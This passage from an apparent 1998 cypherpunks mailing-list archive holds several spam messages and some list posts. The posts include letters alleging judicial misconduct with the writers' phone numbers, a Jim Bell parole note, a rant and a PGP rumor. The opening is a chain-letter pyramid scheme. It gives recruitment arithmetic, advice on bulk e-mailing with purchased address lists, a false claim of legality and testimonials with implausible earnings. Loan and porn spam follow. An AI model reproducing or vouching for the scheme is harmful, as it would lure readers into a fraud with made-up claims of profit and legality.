EASILY get a larger response.) Also assume that everyone else in
YOUR ORGANIZATION gets ONLY 10 downline members.  Follow this
example to achieve the STAGGERING results below.

1st level--your 10 members with
$5...........................................$50
2nd level--10 members from those 10 ($5 x
100)..................$500
3rd level--10 members from those 100 ($5 x 1,000)..........$5,000
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
                                                   THIS TOTALS    
   ----------->$55,550

Remember friends, this assumes that the people who participate
only recruit 10 people each.  Think for a moment what would
happen if they got 20 people to participate!  Most people get
100's of participants! THINK ABOUT IT!

Your cost to participate in this is practically nothing (surely
you can afford $20). You obviously already have an Internet
connection and e-mail is FREE!!! REPORT#3 shows you the most
productive methods for bulk e-mailing and purchasing e-mail
lists.  Some list & bulk e-mail vendors even work on trade!


        About 50,000 new people get online every month!

*******TIPS FOR SUCCESS*******


 *  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and
follow 
     the directions accurately.

 *  Send for the four reports IMMEDIATELY so you will have them
when 
    the orders start coming in because:

    When you receive a $5 order, you MUST send out the requested
    product/report to comply with the U.S. Postal & Lottery Laws, Title
    18,Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S. Code,
    also Code of Federal Regs. vol. 16, Sections 255 and 436, which state 
    that "a product or service must be exchanged for money received."

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

 *  Be patient and persistent with this program. If you follow
the 
    instructions exactly, the results WILL undoubtedly be
SUCCESSFUL!

 *  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!


              *******YOUR SUCCESS GUIDELINE*******


Follow these guidelines to guarantee your success:

If you don't receive 10 to 20 orders for REPORT #1 within two
weeks, continue advertising until you do.  Then, a couple of
weeks later you should receive at least 100 orders for REPORT #2. 
If you don't, continue advertising until you do.  Once you have
received 100 or more orders for REPORT #2, YOU CAN RELAX, because
the system is already working for you, and the cash will continue
to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in
front of a DIFFERENT report.  You can KEEP TRACK of your PROGRESS
by watching which report people are ordering from you.  If you
want to generate more income, send another batch of e-mails and
start the whole process again!  There is no limit to the income
you will generate from this business!

NOTE:  If you need help with starting a business, registering a business name,       
          how income tax is handled, etc., contact your local office of the Small
Business Administration (a Federal agency) for free help and answers to questions.
Also, the Internal Revenue Service offers free help via telephone and free seminars
about business taxes.


        *******T  E  S  T  I  M  O  N  I  A  L  S*******


     This program does work, but you must follow it EXACTLY! 
Especially the rule of not trying to place your name in a
different position, it won't work and you'll lose a lot of
potential income.  I'm living proof that it works.  It really is
a great opportunity to make relatively easy money, with little
cost to you.  If you do choose to participate, follow the program
exactly, and you'll be on your way to financial security. 
          Sean McLaughlin, Jackson, MS

     My name is Frank. My wife, Doris, and I live in Bel-Air, MD.
I am a cost accountant with a major U.S. Corporation and I make
pretty good money. When I received the program I grumbled to
Doris about receiving "junk mail." I made fun of the whole thing,
spouting my knowledge of the population and percentages involved. 
I "knew" it wouldn't work. Doris totally ignored my supposed
intelligence and jumped in with both feet. I made merciless fun
of her, and was ready to lay the old "I told you so" on her when
the thing didn't work... well, the laugh was on me!  Within two
weeks she had received over 50 responses. Within 45 days she had
received over $147,200 in $5 bills! I was shocked!  I was sure
that I had it all figured and that it wouldn't work.  I AM a
believer now. I have joined Doris in her "hobby."   I did have
seven more years until retirement, but I think of the "rat race"
and it's not for me. We owe it all to MLM.
           Frank T., Bel-Air, MD

    I just want to pass along my best wishes and encouragement to
you.  Any doubts you have will vanish when your first orders come
in. I even checked with the U.S. Post Office to verify that the
plan was legal. It definitely is! IT WORKS!!!
           Paul Johnson, Raleigh, NC

    The main reason for this letter is to convince you that this
system is honest, lawful, extremely profitable, and is a way to
get a large amount of money in a short time. I was approached
several times before I checked this out. I joined just to see
what one could expect in return for the minimal effort and money
required.  To my astonishment, I received $36,470.00 in the first
14 weeks, with money still coming in.
           Sincerely yours, Phillip A. Brown, Esq.

    Not being the gambling type, it took me several weeks to make
up my mind to participate in this plan. But conservative that I
am, I decided that the initial investment was so little that
there was just no way that I wouldn't get enough orders to at
least get my money back. Boy, was I surprised when I found my
medium-size post office box crammed with orders!  For awhile, it
got so overloaded that I had to start picking up my mail at the
window. I'll make more money this year than any 10 years of my
life before. The nice thing about this deal is that it doesn't
matter where in the U.S. the people live. There simply isn't a
better investment with a faster return.
         Mary Rockland, Lansing, MI

    I had received this program before. I deleted it, but later I
wondered if I shouldn't have given it a try. Of course, I had no
idea who to contact to get another copy, so I had to wait until I
was e-mailed another program...11 months passed then it came...I
didn't delete this one!...I made more than $41,000 on the first
try!!
          D. Wilburn, Muncie, IN

     This is my third time to participate in this plan. We have
quit our jobs, and will soon buy a home on the beach and live off
the interest on our money.  The only way on earth that this plan
will work for you is if you do it. For your sake, and for your
family's sake don't pass up this golden opportunity.  Good luck
and happy spending!
           Charles Fairchild, Spokane, WA


               ORDER YOUR REPORTS TODAY AND GET 
STARTED ON YOUR ROAD TO 
FINANCIAL FREEDOM!!!
When you are ready for a bulk e-mailer call Smith
International at 352-629-7695.  They do good work. 
You can send an e-mail to their autoresponder at
popcorn@mfi.net.   Just click on the blue letters and
enter the words "Bulk Email Info" in the Subject Line
and in the body of the letter and then click on the
Send Now button.  All remove requests sent to the
above address will receive an autoresponded
informational flyer.   E-mail addresses are recorded
at that site.  They were charging only $210 for
100,000 TRUE AOL addresses.

















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: moneyhelp@mymail.com
Date: Sun, 21 Jun 1998 11:30:12 -0700 (PDT)
To: morenewest@newzdoman.com
Subject: Get the MONEY You Need
Message-ID: <199805280419.AAA07839>
MIME-Version: 1.0
Content-Type: text/plain


                GET THE MONEY YOU NEED RIGHT NOW!

Here's your chance to...

        > Eliminate Credit Card Debt!
        > Escape from High Monthly Payments!
        > Get Relief and Have the Money You Need!
        > Cash in Your Pocket Usually within 7 to 14 days!
        > Make Home Improvements You've Always Wanted!
        > Take the Vacation You Deserve!

How?  Simply  CLICK HERE TO VISIT OUR WEBSITE!
or type or cut & paste: http://www.canus.net/amcap/146.html in your browser

Would you like money for...

            ~ A New Car?
            ~ College Tuition?
            ~ Taxes?
            ~ Consolidate Your Credit Cards?
            ~ A Dream Vacation?
            ~ Home Improvements?

Now It Can Be Yours!   What are you waiting for?

For a FREE evaluation please visit our website by...

              CLICKING HERE (http://www.canus.net/amcap/146.html)

or type or cut & paste: http://www.canus.net/amcap/146.html in your browser

Especially if you're a homeowner, we can help you.  Try us!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 22 Jun 1998 06:16:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Jim Bell Violation Update
Message-ID: <199806221316.JAA04953@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell was released on parole on April 20, but may
be about to be rearrested for parole violation, and
may not yet know the cops are coming to reviolate:

   http://jya.com/jdb062198.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Mon, 22 Jun 1998 06:42:55 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Eric Young: Zimmerman redux?
Message-ID: <D104150098E6D111B7830000F8D90AE80178D9@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: 20 Jun 1998 18:40:14 -0000 
From: Julian Assange <proff@iq.org> 
To: ukcrypto@maillist.ox.ac.uk 

With things starting to heat up here in Australia (DoD/DSD has 
recently taken to making some exceptionally nasty noises about 
prosecuting Eric Young, Tim Hudson and the rest of the Australian 
CryptoMozilla team). I'd like to remind everyone who's interested in 
aussie/nz crypto issues of the aucrypto mailing list. 
<snip> 
                      Australasian & Pacific Cryptography 

               mail the word "subscribe" to aucrypto-request@suburbia.net 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nicole" <43348928@30267.com>
Date: Mon, 22 Jun 1998 16:54:26 -0700 (PDT)
To: Friend@public.com
Subject: Just for You
Message-ID: <199342143263123.GXGT24348@default>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
Hi...

This message is meant for Adults over the age of 21, If you have received this message in error, please delet it now and accept our appologies.

I would like to tell of about this great sex site on the web, offering everything you will ever desire.

It has live sex chat and a live sex xhow from Amsterdam.

Go and check it out.

http://www.sex4u.net/

Love 

Anna


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 22 Jun 1998 13:22:10 -0700 (PDT)
To: art morales <senator@torricelli.senate.gov
Subject: Judicial Misconduct at Tenth Circuit Court of Appeals
Message-ID: <358EB07D.2EFD@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 6/22/98 1:02 PM

Senate Judiciary Committee
http://www.senate.gov/committee/judiciary.html

Republicans

Orrin G. Hatch, Utah, Chairman   senator_hatch@Hatch.senate.gov
Strom Thurmond, South Carolina   senator@thurmond.senate.gov
Charles E. Grassley, Iowa   chuck_grassley@grassley.senate.gov
Arlen Specter, Pennsylvania   senator_specter@specter.senate.gov
Fred Thompson, Tennessee   senator_thompson@thompson.senate.gov
Jon Kyl, Arizona   info@kyl.senate.gov
Mike DeWine, Ohio   senator_dewine@dewine.senate.gov
John Ashcroft, Missouri   john_ashcroft@ashcroft.senate.gov
Spencer Abraham, Michigan   michigan@abraham.senate.gov
Jeff Sessions, Alabama

Democrats

Patrick J. Leahy, Vermont   senator_leahy@leahy.senate.gov
Edward M. Kennedy, Massachusetts   senator@kennedy.senate.gov
Joseph R.Biden, Jr., Delaware   senator@biden.senate.gov
Herb Kohl, Wisconsin   senator_kohl@kohl.senate.gov
Dianne Feinstein, California   senator@feinstein.senate.gov
Russell D. Feingold, Wisconsin   russell_feingold@feingold.senate.gov
Richard Durbin, Illinois   dick@durbin.senate.gov
Robert Torricelli, New Jersey   senator@torricelli.senate.gov

Purpose of this e-mail is to give written proof of criminal judicial
misconduct by Tenth Circuit Court of Appeals clerks Hoecker, Fisher, and
Judges Moore, Barrett, Weis and help get this matter settled.

Thursday March 30, 1995 I wrote Tenth Circuit clerk Hoecker to request a
copy of the docket sheets for case 94-2205  Payne v. Sandia Corporation,
et al

Hoecker did not answer my letter.

On Tuesday March 5,1996 I  wrote  Judge Lucius D. Bunton to ask his help
to get a copy of the docket sheets.  No response.

On Monday September 23, 1996 Arthur R Morales and I wrote  Henry A.
Politz, Chief Judge U.S. Court of Appeals - Fifth Circuit to ask his
help to get a copy of the docket sheets of my case and Morales' Tenth
Circuit case 95-2204.

Tenth Circuit also refused to send Morales copies of docket sheets for
his case.

Politz is Bunton's boss.  No response.

Friday May 30, 1997 I wrote Antonin Scalia to get this help to get a
copy of the docket sheets.  No response.

5 May 1998 citizen John Young finds docket sheets on

    Source: PACER, U.S. Court of Appeals, 10th Circuit, 1-800-279-9107

and posts them on Internet at http://jya.com/whp-10usca.htm

  Docket as of April 10, 1998 0:05 am
  Proceedings include all events.
  94-2205  Payne v. Sandia Corporation, et al

shows that I filed my Brief of the Appellant on 2/19/95.

2/23/95     [835344] Appellant's brief filed by William H. Payne.
            Original and 7 copies.   c/s: y. Served on 2/19/95  Oral
            argument? pro se. Appellee/Respondent's brief due 3/24/95
            for Thomas P. Wright, for Robert Surran, for Paul A.
            Stokes, for Mary J. Stang, for Tommy A. Sellers, for Craig
            A. Searls, for Albert Narath, for Preston B. Herrington,
            for Peter S. Hamilton, for Roger L. Hagengruber, for James
            R. Gosler, for Harold L. Folley, for Robert L. Ewing, for
            C. William Childers, for Harvey J. Brewster, for Sandia
            Corporation (mbm)

mbm writes "Appellee/Respondent's brief due 3/24/95"

Sandia had sent me a copy of its brief by 3/28/96.

I filed  attached MOTION TO GRANT PLAINTIFF-APPELLANT'S DEMANDS ON BASIS
THAT DEFENDANT-APPELLEES FAILED TO FILE BRIEF WITHIN 30 DAYS SPECIFIED
BY FEDERAL RULE OF APPELLATE PROCEDURE 31 on Tuesday the 28th day of
March, 1995

My February 28 MOTION at the Tenth Circuit is filed WITHOUT notice of
service logged.

4/4/95       [845484] Appellant's motion filed by Appellant William H.
             Payne [94-2205] to grant appellant's demands on basis that
             appellees' failed to file timely brief. Original and 3
             copies  c/s: y (mbm)

In 1995 FRAP 25 (a) stated  "[b]riefs shall be deemed filed on the day
of mailing if the 
most expeditious form of delivery by mail, excepting special delivery,
is used."

FRAP 25 has been changed by 1998 to
http://www.ca5.uscourts.gov/docs/frap-iop.htm#25a

Since I mailed Appellant's motion filed by Appellant William H.  Payne
[94-2205] to grant appellant's demands on basis that appellees' failed
to file timely brief on 3/28/98, it is likely Sandia's lawyer Friedman
received it 3/29/95.

Tenth Circuit logs

3/30/95      [844759] Appellee's brief filed by Sandia Corporation,
             Harvey J. Brewster, C. William Childers, Robert L. Ewing,
             Harold L. Folley, James R. Gosler, Roger L. Hagengruber,
             Peter S. Hamilton, Preston B. Herrington, Albert Narath,
             Craig A. Searls, Tommy A. Sellers, Mary J. Stang, Paul A.
             Stokes, Robert Surran, Thomas P. Wright. Original and 7
             copies. c/s: y. Served on 3/27/95  Oral Argument? y
             (appellant is pro se) Appellant's optional reply brief due
             4/13/95 for William H. Payne (mbm)

Federal Rule of Appellate Procedure [FRAP] 26 (c) states

  (c) Additional Time after Service. When a party is required or
permitted to act within a      prescribed period after service of a
paper upon that party, 3 calendar days are added to the     prescribed
period unless the paper is delivered on the date of service stated in
the proof of   service. 

  http://www.ca5.uscourts.gov/docs/frap-iop.htm#26c

While the Tenth Circuit ASSERTS Appellees' brief was, in fact, served on
3/27/95
evidence given below points to the brief  was served, in fact, on
3/29/95.  

I allege that Friedman affixed a false date of service to Sandia's
brief.

I WAS NEVER PROPERLY SERVED.  I wrote

          Wednesday March 29, 1995

          Dan Friedman
          Simons, Cuddy & Friedman
          Pecos Trail Office Compound
          1701 Old Pecos Trail
          POB 4160
          Santa Fe, NM 87502-4160
          505-988-4476
          505-984-1807 FAX

          Dear Lawyer Friedman:

          Today at 14:00 hours I found a green and white about 9x13
          inch envelope in our mail box at my home.

          Mailing label indicated that the envelope came from your
          firm.  CONFIDENTIAL was stamped on the mailing label.

          I  wrote "Received at 14:00 hours on W 3/29/95 with no
          POSTMARK OR STAMP by W. H. Payne" at the bottom of the
          envelope.

          There was no STAMP OR POSTAGE METER LABEL or 
          POSTMARK on the envelope.

          Therefore, I gave the envelope to US Postal Service
          supervisor Mel at 14:49 hours today at the Postal Receiving
          station at 9904 Montgomery, NW in Albuquerque.  Mel has a
          copy of the cover of the envelope with Mel's note written on
          it.

          Mel told me the post office was going to return the envelope
          to your firm for proper mailing.

          I ask:

         1    What did this envelope contain?  Please identify
              the documents precisely.

         2    If any Certificates of Service were included in the
              envelope, then what were the dates affixed to these
              documents?

         3    Who placed this envelope in our mail box?

         Lawyer Friedman:  It appears you missed an important filing
         date.  And are in the process of attempt to correct your
         failure.  But may be using illegitimate methods to conceal
         your failure.

         Please respond as soon as possible so that we all may
         discover what has happened here." ...

Lawyer Friedman did not respond to the above letter.

But Friedman did mail me Appellees' brief many days later in envelope
showing TRUE MAILING date.  Certificate of service on received
Appellees' brief
did not reflect postmark date.

10th Cir. R. 25.4 in 1995 page 62 reads
  
  Papers not accepted for filing. -- The clerk shall not file papers
that do not comply
  with the Federal Rules of Appellate Procedure and these rules See
10thCir. R. 42.1

But Tenth Circuit clerks Fisher and Hoecker despite my protests and
submission of
evidence may have stamped FILED on Sandia's IMPROPERLY SERVED 
Appellee/Respondent's brief according to the Federal Rules of Appellate
Procedure.

Laywer Friedman FALSIFIED THE CERTIFICATE OF SERVICE.	

Friedman DID NOT MAIL ME "Served on 3/27/95."

d) Proof of Service; Filing. A paper presented for filing shall contain
an acknowledgment of service by the   person served or proof of service
in the form of a statement of the date and manner of service, of the
name of the person served, and of the addresses to which the papers were
mailed or at which they were delivered, certified by the person who made
service. Proof of service may appear on or be affixed to the papers
filed. When a brief or appendix is filed by mailing or dispatch in
accordance with Rule 25(a)(2)(B), the proof of service shall also state
the date and manner by which the document was mailed or dispatched to
the clerk.

  http://www.ca5.uscourts.gov/docs/frap-iop.htm#25a
  
Crime apparently committed by Hoecker and Fisher is

 1017. Government seals wrongfully used and instruments wrongfully
sealed 

Whoever fraudulently or wrongfully affixes or impresses the seal of any
department or agency of the United States, to or upon any certificate,
instrument, commission, document, or paper or with knowledge of its
fraudulent character, with wrongful or fraudulent intent, uses, buys,
procures, sells, or transfers to another any such certificate,
instrument, commission, document, or paper, to which or upon which said
seal has been so fraudulently affixed or impressed, shall be fined under
this title or imprisoned not more than five years, or both. 
http://www.law.cornell.edu/uscode/18/1017.shtml

Despite my protests of judicial misconduct Judges Moore, Barrett, Weis
award decision to Sandia

10/6/95      [890055] Order filed by Judges Moore, Barrett, Weis
             "...All outstanding motions are denied..." (found in Order
             & Judgment of 10/6/95) [879579-1]  Parties served by mail.
             (pdw)

when these judges should not have had Appellees' brief before them.

Then in an apparently attempt to conceal what happened

10/6/95     [890076]  NOTE: THIS ENTIRE CASE IS SEALED. Terminated on
            the Merits after Submission Without Oral Hearing; Judgment
            Affirmed; Written, Signed, Unpublished. Moore, authoring
            judge; Barrett; Weis. [94-2205] (pdw)

I WON MY APPEAL, pro se, ON A TECHNICALITY but judges Judges Moore,
Barrett, Weis
awarded the win to Sandia Labs!

Members of Congress, judicial misconduct in this matter has been
well-documented.  Court records
filed with the Tenth Circuit.  But CURRENTLY under seal.

Lawyers involved in this matter attempt to use the legal strategy of
IGNORE and STONEWALL to
attempt to deny me justice.  

Ignoring and stonewalling by lawyers forced Morales and me to seek
visibility so lawyers
could no longer ignore and stonewall.

Lawyer attitude apparently is that they ignore rules of civil procedure
or even the law so long
as their actions are invisible to public scrutiny.

Visibility was achieved by suing the National Security Agency which
revealed even more judicial misconduct http://www.jya.com/whp052898.htm.

I would like to settle all  matters involved with this unfortunate
cyrpto-related matter,
which includes criminal violations of the Privacy Act.

DOE lawyer Steve Dillingham asked me to prepare a settlement offer in
1994.  I wrote a
settlement letter  May 22, 1994 to Dillingham.  Nothing happened.

June 11, 1998 I made several modifications to my 1994 settlement letter
and sent it e-mail
to Robert Nordhaus, Chief Counsel, DOE.

I ask that you

1  help with settlement of my six-year-old since I won my appeal at the
Tenth Circuit,
2  investigate Tenth Circuit case 94-2205  Payne v. Sandia Corporation,
et al to bring
   the guilty to justice.

Sincerely

william payne

505 292 7037  I am not reading e-mail

http://jya.com/whpfiles.htm
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2
http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html

Coauthor Lewis in the above is one of my former MS and PhD students in
computer science.

http://www.friction-free-economy.com/



Monday 6/22/98 1:04 PM

Members of Congress

Purpose of this e-mail is to give written proof of criminal judicial
misconduct by Tenth Circuit Court of Appeals clerks Hoecker, Fisher, and
Judges Anderson, Barrett, Logan and request a congressional
investigation.

After several years, with Payne, of trying to get Tenth Circuit to send
docket sheets from my case,
citizen John Young  http://www.jya.com/index.htm  locates docket sheets
and posts them
    
  Morales Case Dockets 10th USCA                    June 12, 1998

on Internet at http://www.jya.com/arm061298.htm.

  Source: Online records Tenth Circuit Court of Appeals via PACER 

  GENERAL DOCKET FOR
  Tenth Circuit Court of Appeals

  Court of Appeals Docket #: 95-2204                           Filed:
9/29/95
  Nsuit: 3440
  Morales v. Sandia National Lab.
  Appeal from: United States District Court for the District of New
Mexico

I filed

11/9/95     [898274] Appellant's brief filed by Arthur R. Morales.
            Original and 2 copies.   c/s: y. Served on 11/7/95.  Oral
            argument? pro se. Appellee's brief due 12/11/95 for Sandia
            National Lab. (pdw)

Sandia files its FIRST ATTEMPT at

12/11/95   [905033] Appellee's deficient brief filed by Sandia
           National Lab.. Appellee's corrected brief due 12/21/95 for
           Sandia National Lab.  additional copies received 12/11/95.
           (fg)

Tenth Circuit court clerk Patrick Fisher writes Wells on December 11,
1995
concerning Sandia's deficient brief

  [C]orrections, however made, must be accompanied by proof of service
  upon all other parties to the appeal. ...

and issues

12/14/95   [905975] FIRST notice of rules violation for Deborah D.
           Wells for Appellee Sandia National Lab. (sls)

Wells submits

12/21/95    [907974] Appellee's brief filed by Sandia National Lab..
            Original and 7 copies.   c/s: y. Served on 12/20/95  Oral
            Argument? n Appellant's optional reply brief due 1/8/96 for
            Arthur R. Morales (mbm)

but DOES NOT serve me with a copy.

Wells later admits in

2/1/96        [917660] Response filed by Sandia National Lab.
              Appellant/Petitioner motion to clarify   Original and 3
              copies.  c/s: y response Null Relief Code (fg)

Certificate of Service date 30th day of January, 1996,

  [h]ad Appellant simply made a phone call to the Tenth Circuit, he
could
  have established that the Defendant-Appellee's corrected brief was
indeed
  filed on a timely basis, ...

I protested by filing

1/3/96       [909965] Appellant's motion "for the Court to Grant
             Appeal" filed by Appellant Arthur R. Morales [95-2204].
             Original and 3 copies.  c/s: y. (pdw)

1/3/96       [909966] Appellant's motion "for New Trial" filed by
             Appellant Arthur R. Morales [95-2204]. Original and 3
             copies.  c/s: y. (pdw)

1/3/96       [909967] Appellant's motion "to Discipline
             Defendant-Appellee" filed by Appellant Arthur R. Morales
             [95-2204]. Original and 3 copies.  c/s: y. (pdw)

because Sandia did not properly serve me in violation of Fisher's
December
11, 1995 order.

The Tenth Circuit court of appeals should NOT, by its own rules, filed
Appellee's brief filed by Sandia National Lab..  Original and 7
copies.   
c/s: y. Served on 12/20/95

10th Cir. R. 25.4 in 1995 page 62 reads
  
  Papers not accepted for filing. -- The clerk shall not file papers
that do not comply
  with the Federal Rules of Appellate Procedure and these rules See
10thCir. R. 42.1

And is doubtful whether court clerk Fisher had any authority under
appellate procedure
to permit Wells to correct her deficient brief.  

Rather Sandia's  brief did not comply with with Federal Rules of
Appellate Procedure and should have been summarily rejected for filing.

I WON, pro se, my appeal to the Tenth circuit on a technicality but
Judges Anderson, Barrett, Logan
awarded the win to Sandia Labs.

4/2/96        [932848] Order filed by Judges Anderson, Barrett, Logan
              denying parties' motions for general relief(found in Order
              and Judgment of 4/2/96)--"...During the course of this
              appeal, the parties have filed various motions for
              dismissal, summary grant, and sanctions. We find no merit
              to any of these motions, and they are [920851-1] Parties
              served by mail. (pdw)

by accepting and judging on a documents which was not permitted to be
before the court by
its own rules.

Judicial misconduct in my case has been well-documented as it is in
Payne's case.

Payne and I speculate that similar judicial misconduct may have occurred
at the Tenth Circuit.

Sandia lawyer Robert J Park wrote me a settlement letter on Feb 18,
1998.

I filled in the blanks and made minor handwritten chages and returned it
on February 22, 1998.  

But my offer has not yet been accepted.

I ask that you

1  help have my settlement offer accepted,
2  investigate judicial misconduct in case 95-2204 and punish the
guilty.

Some citizens can only express such frustrations with the US court
system with violence.

I seek change by legal reform.

Sincerely

Arthur R Morales
505 345 1381






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Date: Mon, 22 Jun 1998 14:24:44 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Subject: CTIA Daily News from WOW-COM - June 22, 1998
Message-ID: <199806222114.QAA21599@revnet4.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon for the
most important news in wireless communications today.
========================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 22 Jun 1998 17:32:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Blood Sausage -- SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C818C.71EFAE40.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


BloodSausage HogLog - SPACE ALIENS HIDE M DRUGS!!!
___________________________________________________

"The lives of Frank, Gambino, Morel and Serafini ended on 
the gallows of Montreal's Bordeaux Jail on October 24,
1924. Valentino and Davis had their executions commuted
at the last minute."

"No one claimed Frank, Gambino and Valentino were among
the half-dozen gunmen who ambushed the bank car, but
prosecutorn R.L. Calder argued they were still guilty of
murder because of the organized nature of the crime."

~Excerpts from "Blood Brothers" by Peter Edwards.


  MeTheSheeple was glad to learn that these vile, criminal
scumbags, fingered by the person who had actually planned
and committed the crime, were held accountable for the
actions alleged to them by the gang-leader whose life was
spared in return for ratting out alleged coconspirators.
  I was particularly happy because I knew that the same
high standards of justice would undoubtedly be applied to
the criminal scum within the Canadian Justice System under
whose PigSkin Umbrella the Montreal Mobsters ruled the
streets and the citizens who walked them.

"Testimony at the Frank robbery trial showed that police
routinely sipped coffee with hoods and that Montreal's
finest had been tipped off to the armoured car hold-up
well in advance, but did nothing."

  Supreme Court of Canada Justice Louise Coderre (with a
left-handed frog-tongue over the first 'e') said, "Vice
has spread itself across the city with an ugliness that
seemed assured of impunity."

  Rather than bore you with all of the details behind the
criminal scumbag PigsWithBadgesAndGuns being also found
'GUILT OF MURDER BECAUSE OF THE ORGANIZED NATURE OF THE
CRIME', I will just skip ahead in the book and report on
the final outcome of <trumpets blare> JUSTICE <flags fly>
in the case of the police and city officials discovered
to have greased the wheels of organized crime in their
activities of drug dealing, robbery, murder, etc.
  Hmmm....nope...nada....maybe...nope...nope...

  Surprise, surprise! It seems that, following the
Coderre probe, "nothing happened that seriously
threatened the criminals' take. The name of Cadiex 
Street was changed to de Bullion Street after a New
ork play made the old name notorious, but along the 
same pavement the same crimes continued."

  Those without my cynical psychological make-up will
undoubtedly be able to supply you with reasons as to
just why the local citizens felt extremely 'served and
protected' when they came to after being mugged and saw
the new street signs, however, I will merely take a short
break, here, have a good dump, and wipe my butt with yet
another page of the Criminal Code of Canada.


And Silk Badges..?:

"I know who the real public enemies are. But they are
men who have the respect of the public; men who wear
silk hats, who are apparently of standing in the 
community."
~1930's Montreal MobBuster, J.J. Penverne
 (with no frog-licks in his name...)

  Peter Edwards provides the standard journalistic
explaination as to how "The term 'Mafia,' in its truest
form, refers only to organized crime in western Sicily."
and explains how it has been expanded to encompass any
pair of teenagers throwing a rock through a window, as
long as one of them has an Italian name.
  He neglects to explain, as some journalists do, that
the word "Mafia" is becoming increasingly generic, now
including the 'Lebanese Mafia', the 'Columbian Mafia',
etc.
  *All* journalists, however, seem unable to explain why
they continue to avoid naming the continuing organized forces
of armed domination over citizens of *all* ethnic groups the
'Government Mafia'...

  "Blood Brothers" is not the first book to point out that
at the heart of the "honoured society of Calabria" lies the
concept of "omerta" (with a right-handed strand of spaghetti
over the 'a').
  Nor is it the first book to fail to point out that omerta's
"double code of conduct that set different moral codes for 
dealings with those inside and outside one's family circle"
applies not only to Officially Recognized Criminal ScumBag
Organizations, but also to almost every 'gang' larger than
a Cult Of One from the PTA to the CIA to the USA. 
  'Omerta' decrees that when the president of the PTA molests
a child, when the head of the CIA commits treason, when the
president of the USA declares that US citizens will continue
to face imprisonment for exporting the same strength of
encryption that their government is sharing with Communist
China, that a street somewhere be renamed, while everything
else continues on pretty much as before.


  Don't hold your breath waiting for mainstream journalists
to upset the BadAppleCart by referring to the 'PTA Mafia' when 
they deem that your child should be forced to attend school with
a child who can murder them by biting them, while teaching
them that you are a dangerous psycho because of your gun
ownership; or to the 'FBI Mafia' when they murder a mother and
child in attempts to cover their previous unannounced, botched
armed assault on a citizen being charged with civil crimes in
an attempt to persuade him to invent crimes against his friends,
whether they were Jewish or not; or to the 'Government Mafia'
when they spend millions of dollars investigating and/or charging
Phil Zimmerman, Bill Clinton, Bill Gates, Jim Bell, knowing that
the bottomless taxpayer pockets funding their legally unjustified
harassment will guarantee at least moderately successful results,
even if the end result is dropping the matter when the multi-
million dollar stench begins blowing back toward DC.
  Do not expect mainstream journalists to refer to the 'ASPCA
Mafia' when they release a hastily composed 'history' of 
TruthMongrel as a rabid, sharp-toothed, human baby conniseur,
after HeOrShe is cut down by FBI gunfire on Mayonaisse Mountain
during attempts to arrest the Author on 'Dog At Large' charges
filed by the Royal Canadian Mounted Police in Bienfait, Sask.


Silk? We Don't Need No Stinking Silk...:
  The multi-facted PigsEar WebSites that are increasingly
being turned into InterNet Cult of One SilkPurses through
the increasingly efficient and powerful shareware digital
bread-slicers available to Jane and Joe Sheeple in their
quest to serve either God, Mammon, Dog or Mammy, according
to their prediliction, have the capacity, if uncensored 
and uncontrolled, of allowing the individual to rekindle
the creative spark of individuality that reminds them that
the word 'WE' should only be used by Kings, Priests, and
people with tapeworms.
  People with the ability to think for themselves; people
who know that if Timothy McVeigh was really the 'Muenster'
that the mainstream media claimed, then he would have been
in the 'Adams Family' movie; people who demand to know if
Monica Lewinski has a 'bent' pussy; people with conspiring
minds, who want to 'snow'; people who are not afraid to
stand up and cheer for the Officially Recognized BadGuys
on 'Cops' and 'World's Scariest Innocent Bystander
Threatening Police Chases'; people watching 'World's Dumbest
Criminals' who slap their forehead and say, "I hate it when
that happens..."
  People who read the Bienfait Nutly News.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steve Orrin" <privsoft@ix.netcom.com>
Date: Mon, 22 Jun 1998 16:19:07 -0700 (PDT)
To: "Cypherpunks Algebra" <cypherpunks@algebra.com>
Subject: Verisign & NAI Join Forces, PGP out the door?
Message-ID: <199806222317.SAA04853@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


To all:

Word is the PGP is being dropped as a standard and NAI converting over to
x.509 throughout product line. However the info is vague wnough to mean
alot of things:)

sorrin

